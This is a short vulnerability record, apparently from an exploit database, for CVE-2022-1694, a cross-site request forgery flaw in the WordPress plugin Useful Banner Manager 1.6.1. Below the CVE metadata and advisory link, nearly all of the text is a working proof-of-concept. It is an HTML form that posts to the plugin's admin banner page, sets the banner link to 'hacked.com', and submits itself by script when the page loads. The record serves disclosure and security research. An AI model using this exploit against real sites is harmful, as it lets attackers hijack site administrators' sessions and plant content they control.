CVE: CVE-2022-1694

Name: Useful Banner Manager (useful-banner-manager)

Version: 1.6.1

Date: 2022-04-17 18:31:35

Advisory: https://wpscan.com/vulnerability/169a6c81-6c76-4f29-8f60-b2551042b962

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/admin.php?page=useful-banner-manager%2Fbanners.php&ubm_banner_id=1" method="POST" enctype="multipart/form-data">
    <input type="text" name="ubm_banner_name" value="giphy">
    <input type="text" name="ubm_banner_type" value="gif">
    <input type="file" name="ubm_banner_file" value="">
    <input type="text" name="ubm_banner_title" value="test">
    <input type="text" name="ubm_banner_alt" value="test">
    <input type="text" name="ubm_banner_link" value="https://hacked.com">
    <input type="text" name="ubm_link_target" value="_self">
    <input type="text" name="ubm_link_rel" value="dofollow">
    <input type="text" name="ubm_banner_width" value="">
    <input type="text" name="ubm_banner_height" value="">
    <input type="text" name="ubm_active_until" value="">
    <input type="text" name="ubm_banner_order" value="0">
    <input type="text" name="ubm_wrapper_id" value="">
    <input type="text" name="ubm_wrapper_class" value="">
    <input type="text" name="ubm_is_visible" value="yes">
    <input type="text" name="ubm_save_banner" value="Save">
</form>
<script>
    document.forms[0].submit();
</script>